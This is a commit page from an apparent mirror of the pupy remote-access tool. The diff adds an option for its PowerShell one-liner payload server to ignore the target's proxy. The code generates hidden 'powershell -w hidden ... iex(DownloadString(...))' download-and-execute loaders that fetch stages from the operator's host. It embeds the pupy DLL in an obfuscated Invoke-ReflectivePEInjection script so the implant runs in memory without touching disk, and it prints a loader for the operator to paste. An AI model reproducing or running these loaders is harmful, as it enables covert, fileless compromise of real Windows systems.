Rooba
/
pupy
mirror of https://github.com/n1nj4sec/pupy.git
1
1
Fork 0
Code Issues Packages Projects Releases Wiki Activity

ps1_oneliner can be started without target's proxy configuration

This commit is contained in:
quentinhardy 2016-10-19 12:08:25 -04:00
parent 1e74076749
commit b86d0ba4e0
2 changed files with 51 additions and 33 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
pupy/pupygen.py
View File

@ -291,6 +291,8 @@ if __name__=="__main__":
parser.add_argument('-s', '--scriptlet', default=[], action='append', help="offline python scriptlets to execute before starting the connection. Multiple scriptlets can be privided.")
parser.add_argument('-l', '--list', action=ListOptions, nargs=0, help="list available formats, transports, scriptlets and options")
parser.add_argument('-i', '--interface', default=None, help="The default interface to listen on")
parser.add_argument('--no-use-proxy', action='store_true', help="Don't use the target's proxy configuration even if it is used by target (for ps1_oneliner only for now)")
parser.add_argument('--ps1-oneliner-listen-port', default=8080, type=int, help="Port used by ps1_oneliner listener (default: %(default)s)")
parser.add_argument('--randomize-hash', action='store_true', help="add a random string in the exe to make it's hash unknown")
parser.add_argument('--debug-scriptlets', action='store_true', help="don't catch scriptlets exceptions on the client for debug purposes")
parser.add_argument('--workdir', help='Set Workdir (Default = current workdir)')
@ -435,9 +437,11 @@ if __name__=="__main__":
w.write("{0}\n{1}".format(script, code.format(x86InitCode, x86ConcatCode[:-1], x64InitCode, x64ConcatCode[:-1]) ))
elif args.format=="ps1_oneliner":
from pupylib.payloads.ps1_oneliner import serve_ps1_payload
i=conf["launcher_args"].index("--host")+1
link_ip=conf["launcher_args"][i].split(":",1)[0]
serve_ps1_payload(conf, link_ip=link_ip)
link_ip=conf["launcher_args"][conf["launcher_args"].index("--host")+1].split(":",1)[0]
if args.no_use_proxy == True:
serve_ps1_payload(conf, link_ip=link_ip, port=args.ps1_oneliner_listen_port, useTargetProxy=False)
else:
serve_ps1_payload(conf, link_ip=link_ip, port=args.ps1_oneliner_listen_port, useTargetProxy=True)
elif args.format=="rubber_ducky":
rubber_ducky(conf).generateAllForOStarget()
else:

74
pupy/pupylib/payloads/ps1_oneliner.py
View File

@ -19,31 +19,32 @@ ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),"..",".."))
#url_random_one = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(5))
#url_random_two = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(5))
### url_random_one and url_random_two variables are fixed because if you break you ps1_neliner listener, the payload will be not be able to get stages -:(
### "url_random_one" and "url_random_two" variables are fixed because if you break you ps1_listener listener, the ps1_listener payload will not be able to get stages -:(
url_random_one = "eiloShaegae1"
url_random_two = "IMo8oosieVai"
def getInvokeReflectivePEInjectionWithDLLEmbedded(payload_conf):
'''
Return source code of InvokeReflectivePEInjection.ps1 script with pupy dll embedded
Ready for executing
'''
SPLIT_SIZE = 100000
x64InitCode, x86InitCode, x64ConcatCode, x86ConcatCode = "", "", "", ""
code = """
$PEBytes = ""
{0}
$PEBytesTotal = [System.Convert]::FromBase64String({1})
Invoke-ReflectivePEInjection -PEBytes $PEBytesTotal -ForceASLR
"""#{1}=x86dll
binaryX86=b64encode(get_edit_pupyx86_dll(payload_conf))
binaryX86parts = [binaryX86[i:i+SPLIT_SIZE] for i in range(0, len(binaryX86), SPLIT_SIZE)]
for i,aPart in enumerate(binaryX86parts):
x86InitCode += "$PEBytes{0}=\"{1}\"\n".format(i,aPart)
x86ConcatCode += "$PEBytes{0}+".format(i)
print(colorize("[+] ","green")+"X86 pupy dll loaded and {0} variables generated".format(i+1))
script = obfuscatePowershellScript(open(os.path.join(ROOT, "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1"), 'r').read())
return obfs_ps_script("{0}\n{1}".format(script, code.format(x86InitCode, x86ConcatCode[:-1])))
'''
Return source code of InvokeReflectivePEInjection.ps1 script with pupy dll embedded
Ready for executing
'''
SPLIT_SIZE = 100000
x64InitCode, x86InitCode, x64ConcatCode, x86ConcatCode = "", "", "", ""
code = """
$PEBytes = ""
{0}
$PEBytesTotal = [System.Convert]::FromBase64String({1})
Invoke-ReflectivePEInjection -PEBytes $PEBytesTotal -ForceASLR
"""#{1}=x86dll
binaryX86=b64encode(get_edit_pupyx86_dll(payload_conf))
binaryX86parts = [binaryX86[i:i+SPLIT_SIZE] for i in range(0, len(binaryX86), SPLIT_SIZE)]
for i,aPart in enumerate(binaryX86parts):
x86InitCode += "$PEBytes{0}=\"{1}\"\n".format(i,aPart)
x86ConcatCode += "$PEBytes{0}+".format(i)
print(colorize("[+] ","green")+"X86 pupy dll loaded and {0} variables generated".format(i+1))
script = obfuscatePowershellScript(open(os.path.join(ROOT, "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1"), 'r').read())
return obfs_ps_script("{0}\n{1}".format(script, code.format(x86InitCode, x86ConcatCode[:-1])))
def create_ps_command(ps_command, force_ps32=False, nothidden=False):
ps_command = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};
@ -88,9 +89,16 @@ class PupyPayloadHTTPHandler(BaseHTTPRequestHandler):
self.send_response(200)
self.send_header('Content-type','text/html')
self.end_headers()
launcher = """
IEX (New-Object Net.WebClient).DownloadString('http://{server}:{port}/{url_random_two}');""".format(
if self.server.useTargetProxy == True:
print colorize("[+] ","green")+"Stage 1 configured for using target's proxy configuration"
launcher = """IEX (New-Object Net.WebClient).DownloadString('http://{server}:{port}/{url_random_two}');""".format(
server=self.server.link_ip,
port=self.server.link_port,
url_random_two=url_random_two
)
else:
print colorize("[+] ","green")+"Stage 1 configured for NOT using target's proxy configuration"
launcher = """$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();iex($w.DownloadString('http://{server}:{port}/{url_random_two}'));""".format(
server=self.server.link_ip,
port=self.server.link_port,
url_random_two=url_random_two
@ -115,12 +123,13 @@ class PupyPayloadHTTPHandler(BaseHTTPRequestHandler):
return
class ps1_HTTPServer(HTTPServer):
def __init__(self, server_address, conf, link_ip, link_port, ssl):
def __init__(self, server_address, conf, link_ip, link_port, ssl, useTargetProxy):
self.payload_conf = conf
self.link_ip=link_ip
self.link_port=link_port
self.aes_key=''.join([random.choice(string.ascii_lowercase+string.ascii_uppercase+string.digits) for _ in range(0,16)]) # must be 16 char long for aes 128
self.random_reflectivepeinj_name=''.join([random.choice(string.ascii_lowercase+string.ascii_uppercase+string.digits) for _ in range(0,random.randint(8,12))]) # must be 16 char long for aes 128
self.useTargetProxy = useTargetProxy
HTTPServer.__init__(self, server_address, PupyPayloadHTTPHandler)
if ssl:
config = configparser.ConfigParser()
@ -129,11 +138,11 @@ class ps1_HTTPServer(HTTPServer):
certfile=config.get("pupyd","certfile").replace("\\",os.sep).replace("/",os.sep)
self.socket = wrap_socket (self.socket, certfile=certfile, keyfile=keyfile, server_side=True)
def serve_ps1_payload(conf, ip="0.0.0.0", port=8080, link_ip="<your_ip>", ssl=False):
def serve_ps1_payload(conf, ip="0.0.0.0", port=8080, link_ip="<your_ip>", ssl=False, useTargetProxy=True):
try:
while True:
try:
server = ps1_HTTPServer((ip, port), conf, link_ip, port, ssl)
server = ps1_HTTPServer((ip, port), conf, link_ip, port, ssl, useTargetProxy)
break
except Exception as e:
# [Errno 98] Adress already in use
@ -143,11 +152,16 @@ def serve_ps1_payload(conf, ip="0.0.0.0", port=8080, link_ip="<your_ip>", ssl=Fa
raise
print colorize("[+] ","green")+"copy/paste this one-line loader to deploy pupy without writing on the disk :"
print " --- "
oneliner=colorize("powershell.exe -w hidden -noni -nop -c \"iex(New-Object System.Net.WebClient).DownloadString('http://%s:%s/%s')\""%(link_ip, port, url_random_one), "green")
# This line could work check when proxy is used (have to be tested)
# oneliner=colorize("powershell.exe -w hidden -noni -nop -c $K=new-object net.webclient;$K.proxy=[Net.WebRequest]::GetSystemWebProxy();$K.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $K.downloadstring('http://%s:%s/pa')"%(link_ip, port), "green")
if useTargetProxy == True:
oneliner=colorize("powershell.exe -w hidden -noni -nop -c \"iex(New-Object System.Net.WebClient).DownloadString('http://%s:%s/%s')\""%(link_ip, port, url_random_one), "green")
message=colorize("Please note that if the target's system uses a proxy, this previous powershell command will download/execute pupy through the proxy", "yellow")
else:
oneliner=colorize("powershell.exe -w hidden -noni -nop -c \"$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();iex($w.DownloadString('http://%s:%s/%s'));\""%(link_ip, port, url_random_one), "green")
message= colorize("Please note that even if the target's system uses a proxy, this previous powershell command will not use the proxy for downloading pupy", "yellow")
print oneliner
print " --- "
print message
print " --- "
print colorize("[+] ","green")+'Started http server on %s:%s '%(ip, port)
print colorize("[+] ","green")+'waiting for a connection ...'